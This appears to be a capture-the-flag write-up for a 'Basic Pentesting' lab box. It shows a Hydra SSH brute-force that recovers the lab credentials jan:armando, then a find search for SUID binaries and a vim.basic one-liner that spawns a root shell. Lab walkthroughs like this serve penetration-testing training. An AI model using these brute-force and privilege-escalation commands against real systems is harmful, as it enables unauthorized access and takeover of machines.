Skip to main content

Basic Pentesting

HYDRA

We were able to Brute-Force the credentials of the User: Jan
Brute-Forcing SSH: armando

[DATA] attacking ssh://10.10.243.127:22/
[22][ssh] host: 10.10.243.127   login: jan   password: armando

Privilege Escalation

Using SSH Credentials to Login: jan:armando

jan@basic2:~$ id
uid=1001(jan) gid=1001(jan) groups=1001(jan)

The /usr/bin/vim.basic Binary has the SUID Bit Set.

jan@basic2:~$ find / -type f -perm -04000 -ls 2>/dev/null
   ...
   537537   2384 -rwsr-xr-x   1 root     root        2437320 Nov 24  2016 /usr/bin/vim.basic
   ...

Using VIM to Escalate Privileges.

jan@basic2:~$ /usr/bin/vim.basic -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'

root@basic2:~$ id
uid=1001(jan) gid=1001(jan) euid=0(root) groups=1001(jan)
root@basic2:~$ whoami
root

HYDRA
Privilege Escalation